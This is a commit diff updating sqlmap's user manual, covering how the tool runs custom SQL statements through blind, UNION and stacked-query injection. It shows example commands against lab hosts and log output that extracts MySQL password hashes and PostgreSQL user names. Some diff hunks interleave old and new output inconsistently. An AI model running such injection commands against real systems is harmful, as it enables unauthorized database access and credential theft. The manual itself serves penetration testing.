Minor update to the user's manual

2025-11-04 09:57:38 +03:00 · 2009-02-01 00:20:08 +00:00 · 2009-02-01 00:20:08 +00:00 · 77d9d22ceb
commit 77d9d22ceb
parent dded57f1cd
3 changed files with 150 additions and 150 deletions
--- a/doc/README.html
+++ b/doc/README.html
@ -3455,8 +3455,14 @@ as a users' database.</P>
 <P>Options: <CODE>--sql-query</CODE> and <CODE>--sql-shell</CODE></P>
 <P>The SQL query and the SQL shell features makes the user able to run
-whatever <CODE>SELECT</CODE> statement on the web application's back-end
+custom SQL statement on the web application's back-end database management.
-database management system and retrieve its output.</P>
+sqlmap automatically recognize the type of SQL statement provided and
 choose which SQL injection technique to use to execute it: if it is a
 <CODE>SELECT</CODE> statement it will retrieve its output through the blind SQL
 injection or UNION query SQL injection technique depending on the user's
 options, otherwise it will execute the query through the stacked query
 SQL injection technique if the web application supports multiple
 statements on the back-end database management system.</P>
 <P>Examples on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
 <P>
@ -3495,9 +3501,9 @@ SELECT 'foo', 'bar':    'foo, bar'
 <P>As you can see from this last example, sqlmap splits the query in two
 different <CODE>SELECT</CODE> statement to be able to retrieve the output even
-when using blind SQL injection technique.
+when using the blind SQL injection technique.
-Otherwise in inband SQL injection technique it only perform a single HTTP
+Otherwise in UNION query SQL injection technique it only performs a single
-request to get the user's query output:</P>
+HTTP request to get the user's query output:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
@ -3524,24 +3530,12 @@ SELECT 'foo', 'bar' [1]:
 </CODE></BLOCKQUOTE>
 </P>
-<P>Examples on an <B>Oracle XE 10.2.0.1</B> target:</P>
+<P>If your <CODE>SELECT</CODE> statement contains a <CODE>FROM</CODE> clause, sqlmap
-<P>
+asks the user if such statement can return multiple entries and in such
-<BLOCKQUOTE><CODE>
+case the tool knows how to unpack the query correctly to retrieve its
-<PRE>
+whole output entry per entry when going through blind SQL injection
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-query \
+technique. Through UNION query SQL injection it retrieved the whole output
-  "SELECT 'foo' FROM dual" -v 0
+in a single response.</P>
 [hh:mm:04] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] n
 SELECT 'foo' FROM dual:    'foo'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>As you can see, if your <CODE>SELECT</CODE> statement contains a <CODE>FROM</CODE>
 clause, sqlmap asks the user if such statement can return multiple entries
 and in such case the tool knows how to unpack the query correctly to
 retrieve its whole output line per line when going through blind SQL
 injection technique.</P>
 <P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
 <P>
@ -3550,9 +3544,9 @@ injection technique.</P>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query \
  "SELECT usename FROM pg_user" -v 0
-[hh:mm:47] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y
+[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
-[hh:mm:48] [INPUT] the SQL query that you provide can return up to 3 entries. How many 
+[hh:mm:37] [INPUT] the SQL query provided can return up to 2 entries. How many entries 
-entries do you want to retrieve?
+do you want to retrieve?
 [a] All (default)
 [#] Specific number
 [q] Quit
@ -3564,72 +3558,62 @@ SELECT usename FROM pg_user [2]:
 </CODE></BLOCKQUOTE>
 </P>
-<P>As you can see from the last example, sqlmap counts the number of entries
+<P>As you can see from the last example, sqlmap counted the number of entries
-for your query and asks how many entries from the top you want to dump.
+for your query and asks how many entries you want to dump.
 Otherwise if you specify also the <CODE>LIMIT</CODE>, or similar, clause
-sqlmap will not ask anything, just unpack the query and return its
+sqlmap will not ask anything, it just unpacks the query and return its
-output line per line when going through blind SQL injection technique.</P>
+output entry per entry when going through blind SQL injection technique.
 Through UNION query SQL injection it retrieved the whole output in a
 single response.</P>
 <P>Example on a <B>MySQL 5.0.67</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query \
-  "SELECT user, host, password FROM mysql.user LIMIT 1, 3" -v 1
+  "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
 [...]
 back-end DBMS:  MySQL >= 5.0.0
-[hh:mm:11] [INFO] fetching SQL SELECT query output: 'SELECT user, host, password FROM 
+[hh:mm:22] [INFO] fetching SQL SELECT statement query output: 'SELECT host, password FROM 
 mysql.user LIMIT 1, 3'
-[hh:mm:12] [INFO] the SQL query provided has more than a field. sqlmap will now unpack 
+[hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
-it into distinct queries to be able to retrieve the output even if we are going blind
+into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 1, 1
+mysql.user LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: root
+[hh:mm:22] [INFO] retrieved: localhost
-[hh:mm:12] [INFO] performed 34 queries in 0 seconds
+[hh:mm:22] [INFO] performed 69 queries in 0 seconds
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 1, 1
+mysql.user LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: localhost
+[hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:12] [INFO] performed 69 queries in 0 seconds
+[hh:mm:24] [INFO] performed 293 queries in 2 seconds
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:24] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 1, 1
+mysql.user LIMIT 2, 1
-[hh:mm:12] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
+[hh:mm:24] [INFO] retrieved: localhost
-[hh:mm:13] [INFO] performed 293 queries in 0 seconds
+[hh:mm:25] [INFO] performed 69 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:25] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 2, 1
+mysql.user LIMIT 2, 1
-[hh:mm:13] [INFO] retrieved: root
+[hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:13] [INFO] performed 34 queries in 0 seconds
+[hh:mm:27] [INFO] performed 293 queries in 2 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:27] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 2, 1
+mysql.user LIMIT 3, 1
-[hh:mm:13] [INFO] retrieved: leboyer
+[hh:mm:27] [INFO] retrieved: localhost
-[hh:mm:13] [INFO] performed 55 queries in 0 seconds
+[hh:mm:28] [INFO] performed 69 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:28] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) 
-ORDER BY user ASC LIMIT 2, 1
+FROM mysql.user LIMIT 3, 1
-[hh:mm:13] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
+[hh:mm:28] [INFO] retrieved: 
-[hh:mm:14] [INFO] performed 293 queries in 0 seconds
+[hh:mm:28] [INFO] performed 6 queries in 0 seconds
-[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
-ORDER BY user ASC LIMIT 3, 1
+[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:14] [INFO] retrieved: root
+[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:14] [INFO] performed 34 queries in 0 seconds
+[*] localhost, 
 [hh:mm:14] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user 
 ORDER BY user ASC LIMIT 3, 1
 [hh:mm:14] [INFO] retrieved: 192.168.1.121
 [hh:mm:14] [INFO] performed 69 queries in 0 seconds
 [hh:mm:14] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user 
 ORDER BY user ASC LIMIT 3, 1
 [hh:mm:14] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
 [hh:mm:15] [INFO] performed 293 queries in 0 seconds
 SELECT user, host, password FROM mysql.user LIMIT 1, 3 [3]:
 [*] root, localhost, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
 [*] root, leboyer, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
 [*] root, 192.168.1.121, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>The SQL shell option gives you access to run your own SQL statement
-interactively, like a SQL console logged into the back-end database
+interactively, like a SQL console logged to the back-end database
 management system.
 This feature has TAB completion and history support.</P>
@ -3804,6 +3788,23 @@ an asterisk instead of the column(s) name, sqlmap first retrieves the
 column names of the table then asks if the query can return multiple
 entries and goes on.</P>
 <P>Example of SQL statement other than <CODE>SELECT</CODE> on an <B>Oracle XE
 10.2.0.1</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-shell -v 1
 [...]
 back-end DBMS: Oracle
 [hh:mm:20] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER
 sql> TODO
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">File system access</A>
 </H2>
--- a/doc/README.pdf
+++ b/doc/README.pdf
--- a/doc/README.sgml
+++ b/doc/README.sgml
@ -3356,15 +3356,19 @@ as a users' database.
 <sect2>Run your own SQL statement
 <!-- TODO: improve with example on INSERT/DROP/xp_cmdshell -->
 <p>
 Options: <tt>--sql-query</tt> and <tt>--sql-shell</tt>
 <p>
 The SQL query and the SQL shell features makes the user able to run
-whatever <tt>SELECT</tt> statement on the web application's back-end
+custom SQL statement on the web application's back-end database management.
-database management system and retrieve its output.
+sqlmap automatically recognize the type of SQL statement provided and
 choose which SQL injection technique to use to execute it: if it is a
 <tt>SELECT</tt> statement it will retrieve its output through the blind SQL
 injection or UNION query SQL injection technique depending on the user's
 options, otherwise it will execute the query through the stacked query
 SQL injection technique if the web application supports multiple
 statements on the back-end database management system.
 <p>
 Examples on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
@ -3402,9 +3406,9 @@ SELECT 'foo', 'bar':    'foo, bar'
 <p>
 As you can see from this last example, sqlmap splits the query in two
 different <tt>SELECT</tt> statement to be able to retrieve the output even
-when using blind SQL injection technique.
+when using the blind SQL injection technique.
-Otherwise in inband SQL injection technique it only perform a single HTTP
+Otherwise in UNION query SQL injection technique it only performs a single
-request to get the user's query output:
+HTTP request to get the user's query output:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
@ -3429,22 +3433,12 @@ SELECT 'foo', 'bar' [1]:
 </verb></tscreen>
 <p>
-Examples on an <bf>Oracle XE 10.2.0.1</bf> target:
+If your <tt>SELECT</tt> statement contains a <tt>FROM</tt> clause, sqlmap
-
+asks the user if such statement can return multiple entries and in such
-<tscreen><verb>
+case the tool knows how to unpack the query correctly to retrieve its
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-query \
+whole output entry per entry when going through blind SQL injection
-  "SELECT 'foo' FROM dual" -v 0
+technique. Through UNION query SQL injection it retrieved the whole output
-
+in a single response.
 [hh:mm:04] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] n
 SELECT 'foo' FROM dual:    'foo'
 </verb></tscreen>
 <p>
 As you can see, if your <tt>SELECT</tt> statement contains a <tt>FROM</tt>
 clause, sqlmap asks the user if such statement can return multiple entries
 and in such case the tool knows how to unpack the query correctly to
 retrieve its whole output line per line when going through blind SQL
 injection technique.
 <p>
 Example on a <bf>PostgreSQL 8.3.5</bf> target:
@ -3453,9 +3447,9 @@ Example on a <bf>PostgreSQL 8.3.5</bf> target:
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query \
  "SELECT usename FROM pg_user" -v 0
-[hh:mm:47] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y
+[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
-[hh:mm:48] [INPUT] the SQL query that you provide can return up to 3 entries. How many 
+[hh:mm:37] [INPUT] the SQL query provided can return up to 2 entries. How many entries 
-entries do you want to retrieve?
+do you want to retrieve?
 [a] All (default)
 [#] Specific number
 [q] Quit
@ -3466,71 +3460,61 @@ SELECT usename FROM pg_user [2]:
 </verb></tscreen>
 <p>
-As you can see from the last example, sqlmap counts the number of entries
+As you can see from the last example, sqlmap counted the number of entries
-for your query and asks how many entries from the top you want to dump.
+for your query and asks how many entries you want to dump.
 Otherwise if you specify also the <tt>LIMIT</tt>, or similar, clause
-sqlmap will not ask anything, just unpack the query and return its
+sqlmap will not ask anything, it just unpacks the query and return its
-output line per line when going through blind SQL injection technique.
+output entry per entry when going through blind SQL injection technique.
 Through UNION query SQL injection it retrieved the whole output in a
 single response.
 <p>
 Example on a <bf>MySQL 5.0.67</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query \
-  "SELECT user, host, password FROM mysql.user LIMIT 1, 3" -v 1
+  "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
 [...]
 back-end DBMS:  MySQL >= 5.0.0
-[hh:mm:11] [INFO] fetching SQL SELECT query output: 'SELECT user, host, password FROM 
+[hh:mm:22] [INFO] fetching SQL SELECT statement query output: 'SELECT host, password FROM 
 mysql.user LIMIT 1, 3'
-[hh:mm:12] [INFO] the SQL query provided has more than a field. sqlmap will now unpack 
+[hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
-it into distinct queries to be able to retrieve the output even if we are going blind
+into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 1, 1
+mysql.user LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: root
+[hh:mm:22] [INFO] retrieved: localhost
-[hh:mm:12] [INFO] performed 34 queries in 0 seconds
+[hh:mm:22] [INFO] performed 69 queries in 0 seconds
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 1, 1
+mysql.user LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: localhost
+[hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:12] [INFO] performed 69 queries in 0 seconds
+[hh:mm:24] [INFO] performed 293 queries in 2 seconds
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:24] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 1, 1
+mysql.user LIMIT 2, 1
-[hh:mm:12] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
+[hh:mm:24] [INFO] retrieved: localhost
-[hh:mm:13] [INFO] performed 293 queries in 0 seconds
+[hh:mm:25] [INFO] performed 69 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:25] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 2, 1
+mysql.user LIMIT 2, 1
-[hh:mm:13] [INFO] retrieved: root
+[hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:13] [INFO] performed 34 queries in 0 seconds
+[hh:mm:27] [INFO] performed 293 queries in 2 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:27] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-ORDER BY user ASC LIMIT 2, 1
+mysql.user LIMIT 3, 1
-[hh:mm:13] [INFO] retrieved: leboyer
+[hh:mm:27] [INFO] retrieved: localhost
-[hh:mm:13] [INFO] performed 55 queries in 0 seconds
+[hh:mm:28] [INFO] performed 69 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+[hh:mm:28] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) 
-ORDER BY user ASC LIMIT 2, 1
+FROM mysql.user LIMIT 3, 1
-[hh:mm:13] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
+[hh:mm:28] [INFO] retrieved: 
-[hh:mm:14] [INFO] performed 293 queries in 0 seconds
+[hh:mm:28] [INFO] performed 6 queries in 0 seconds
-[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user 
+SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
-ORDER BY user ASC LIMIT 3, 1
+[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:14] [INFO] retrieved: root
+[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:14] [INFO] performed 34 queries in 0 seconds
+[*] localhost, 
 [hh:mm:14] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user 
 ORDER BY user ASC LIMIT 3, 1
 [hh:mm:14] [INFO] retrieved: 192.168.1.121
 [hh:mm:14] [INFO] performed 69 queries in 0 seconds
 [hh:mm:14] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user 
 ORDER BY user ASC LIMIT 3, 1
 [hh:mm:14] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
 [hh:mm:15] [INFO] performed 293 queries in 0 seconds
 SELECT user, host, password FROM mysql.user LIMIT 1, 3 [3]:
 [*] root, localhost, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
 [*] root, leboyer, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
 [*] root, 192.168.1.121, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
 </verb></tscreen>
 <p>
 The SQL shell option gives you access to run your own SQL statement
-interactively, like a SQL console logged into the back-end database
+interactively, like a SQL console logged to the back-end database
 management system.
 This feature has TAB completion and history support.
@ -3701,6 +3685,21 @@ an asterisk instead of the column(s) name, sqlmap first retrieves the
 column names of the table then asks if the query can return multiple
 entries and goes on.
 <p>
 Example of SQL statement other than <tt>SELECT</tt> on an <bf>Oracle XE
 10.2.0.1</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-shell -v 1
 [...]
 back-end DBMS: Oracle
 [hh:mm:20] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER
 sql> TODO
 </verb></tscreen>
 <sect1>File system access